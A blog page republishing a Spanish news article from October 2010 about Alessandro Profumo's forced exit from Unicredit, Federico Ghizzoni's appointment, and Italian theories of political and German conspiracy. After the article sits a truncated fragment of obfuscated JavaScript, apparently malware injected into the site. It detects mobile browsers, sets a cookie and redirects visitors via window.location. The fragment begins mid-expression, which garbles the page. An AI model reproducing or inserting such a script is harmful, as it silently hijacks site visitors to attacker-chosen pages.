• Noticias maquetadas 10.10.2010

    PERPLEJIDAD EN ITALIA

    Desgaste y maquiavelismo.

    El carismático Profumo cayó de Unicredit por presiones políticas y su arrogancia como gestor

    Eusebio Val – Roma  – 03/10/2010

    Alemania no tiene fuerza para el complot, pero sí desea mayor expansión de Unicredit en el este de Europa
    AItalia le cuesta sobreponerse al terremoto de Unicredit. El súbito y traumático relevo de Alessandro Profumo al frente de su mayor y más internacionalizado banco ha sido difícil de digerir. Siempre muy inclinados a ver conspiraciones, los italianos han intuido maniobras maquiavélicas exteriores y tejemanejes políticos nacionales. Probablemente ha habido un poco de todo eso, pero también el natural desgaste de un gestor con fama de arrogante que llevaba mucho tiempo en el puesto y había tomado decisiones controvertidas.

    El consejo de administración, reunido el jueves en Varsovia, nombró como nuevo consejero delegado a Federico Ghizzoni, un hombre de la casa, que era uno de los vices de Profumo. La decisión, unánime, indica un deseo de transmitir continuidad. «El grupo es muy fuerte, seguiremos como lo hemos hecho hasta ahora», dijo el nuevo hombre fuerte y animó al resto del staff directivo a seguir en sus puestos. Quedó sin asignar el cargo de director general.

    Nueve días de vacío de poder fueron demasiados para una institución de tanta envergadura. Esa fue una de las primeras críticas que suscitó la operación, calificada de «torpe» por el propio ministro italiano de Economía, Giulio Tremonti. Está claro que las conjeturas en torno a Unicredit no se detendrán tras agarrar el timón Ghizzoni. Las réplicas de un seísmo suelen durar.

    La destitución del carismático Profumo, el pasado 21 de septiembre, golpeó el mundo financiero italiano con inusitada violencia. No era la caída de un banquero cualquiera. Profumo, de 53 años, fue el hombre que creó Unicredit, en 1998, a partir de una compleja fusión de bancos – alguno de ellos ex estatal-y cajas de ahorros regionales , y que pilotó desde entonces a la entidad, convirtiéndola en un gigante continental. ¿Por qué entonces su humillante final?

    La primera razón objetiva que se esgrimió fue la discrepancia con el consejo de administración por haberle ocultado Profumo los planes de los inversores libios de aumentar su participación hasta el 7,5 por ciento de Unicredit. Otro motivo obvio eran los decepcionantes resultados del grupo, golpeado por la crisis y salpicado también por la debacle hipotecaria.

    Los medios italianos se apresuraron a interpretar la defenestración de Profumo en clave política y bajo el prisma del complot. «¿Quién tiene miedo a una banca autónoma?», se preguntaba el diario económico Il Sole 24 Ore en un editorial en primera página. Algunos prefirieron la terminología bélica y hablaban de un blitzkrieg,de una guerra relámpago, desencadenada por un eje germano-padano (en alusión a los inversores alemanes y a los líderes del norte de Italia, la mítica Padania que reivindica la Liga Norte). Un común denominador de los análisis fue que con la salida de Profumo se iba un banquero que siempre defendió su independencia ante las presiones políticas, un gestor que hacía honor a su apodo, Míster Arrogancia, y se atribuía la máxima libertad de acción frente al consejo de administración. El Corriere della Sera señalaba que Profumo «intentó en numerosas ocasiones desmarcarse de la red tradicional entre finanzas y poderes». El rotativo británico Financial Times,a menudo sarcástico en sus juicios sobre los países meridionales, concluyó que Profumo era «demasiado moderno para Italia».

    La supuesta «conspiración alemana» ha perdido peso. Quienes la manejaron, más por un impulso emocional que en base a datos reales, han tenido que aceptar que la propiedad accionarial y ls composición del consejo de administración – 6 alemanes sobre 23-desmienten el complot teutón. Sí existen símbolos fuertes, como la presencia como consejero del bávaro Theo Waigel – ministro de Finanzas del canciller Kohl y uno de los artífices del euro-y realidades incontestables, como el interés germano en una expansión aún más fuerte de Unicredit en el este de Europa, donde Alemania tiene enormes intereses estratégicos.

    Pero el maquiavelismo, si lo ha habido, tiene una raíz más italiana que alemana. La Liga Norte, un partido en alza, no oculta su ambición de «conquistar los bancos» – la frase es de Umberto Bossi-de que no den la espalda al territorio y sean más dóciles a las necesidades del poder político.

     

    b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}

  • Comments are closed.

Calendario de artículos

octubre 2010
L M X J V S D
 123
45678910
11121314151617
18192021222324
25262728293031

Artículos anteriores